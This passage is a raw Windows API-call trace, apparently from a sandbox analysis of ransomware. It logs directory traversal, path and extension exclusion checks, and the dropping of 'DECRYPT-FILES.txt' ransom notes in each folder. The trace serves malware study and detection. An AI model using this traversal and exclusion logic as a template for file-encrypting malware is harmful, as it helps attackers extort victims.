ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA\\", cAlternateFileName="")) returned 0 [0087.981] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0087.981] CloseHandle (hObject=0x438) returned 1 [0087.981] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.981] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.981] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0087.981] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0087.981] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0087.981] lstrcatW (in: lpString1="Internet Explorer", lpString2="\\" | out: lpString1="Internet Explorer\\") returned="Internet Explorer\\" [0087.981] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Program Files") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch=":\\Windows") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Games\\") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\All Users") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="AhnLab") returned 0x0 [0087.981] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.982] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 61 [0087.982] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.982] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\jkbimi8.tmp") returned 73 [0087.982] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0087.985] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 61 [0087.985] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.985] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\DECRYPT-FILES.txt") returned 79 [0087.985] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0087.988] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0087.989] CloseHandle (hObject=0x43c) returned 1 [0087.989] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 61 [0087.989] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0087.989] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0087.990] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.990] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.990] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.990] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a41560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.990] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.990] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.990] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.990] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.990] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.990] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.990] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.990] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.990] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 61 [0087.990] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.990] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0087.990] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\jkbimi8.tmp" [0087.990] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.991] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.991] CloseHandle (hObject=0x0) returned 0 [0087.991] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.991] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0087.991] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0087.991] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0087.991] lstrcatW (in: lpString1="Quick Launch", lpString2="\\" | out: lpString1="Quick Launch\\") returned="Quick Launch\\" [0087.991] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Program Files") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch=":\\Windows") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Games\\") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\All Users") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.991] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="AhnLab") returned 0x0 [0087.992] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.992] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 74 [0087.992] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.992] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\jkbimi8.tmp") returned 86 [0087.992] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0087.994] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 74 [0087.994] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.994] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\DECRYPT-FILES.txt") returned 92 [0087.994] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0087.994] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0087.995] CloseHandle (hObject=0x444) returned 1 [0087.995] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 74 [0087.995] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0087.995] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0087.995] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.995] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.995] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.995] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.995] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a41560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.995] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.995] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de4960a, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e1692f0, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x92, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0087.995] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0087.995] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0087.995] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0087.995] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0087.995] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a41560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.995] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.995] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.995] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.995] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.995] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.996] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.996] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.996] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.996] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.996] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.996] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.996] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.996] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.996] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.996] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.996] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 74 [0087.996] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.996] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0087.996] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\jkbimi8.tmp" [0087.996] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.996] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.996] CloseHandle (hObject=0x0) returned 0 [0087.996] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.997] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de234aa, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="autorun.inf") returned 1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="boot.ini") returned 1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="desktop.ini") returned 1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ntuser.dat") returned 1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="iconcache.db") returned 1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="bootsect.bak") returned 1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ntuser.dat.log") returned 1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="thumbs.db") returned -1 [0087.997] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Bootfont.bin") returned 1 [0087.997] lstrlenW (lpString="Shows Desktop.lnk") returned 17 [0087.997] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0087.997] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0087.997] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0087.997] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0087.997] lstrcatW (in: lpString1="User Pinned", lpString2="\\" | out: lpString1="User Pinned\\") returned="User Pinned\\" [0087.997] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="User Pinned\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0087.997] StrStrW 